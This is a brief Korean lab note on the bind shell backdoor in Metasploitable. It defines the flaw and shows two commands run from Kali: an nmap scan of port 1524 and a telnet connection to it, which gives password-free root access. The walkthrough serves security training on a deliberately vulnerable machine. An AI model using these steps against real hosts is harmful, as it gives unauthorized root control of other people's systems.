Bind Shell Backdoor Detection 취약점

*정의
 공격자는 원격포트를 통해 인증없이 연결하고 명령어을 직접 전송하여 사용 할 수 있다.

 Attacker : kali
 Victim    : metasploitable

*실습

 (kali)
 root@kali:~# nmap -sV -p 1524 192.168.10.134

 
root@kali:~# telnet 192.168.10.134 1524

 암호입력없이 root권한으로 연결이 되어진다.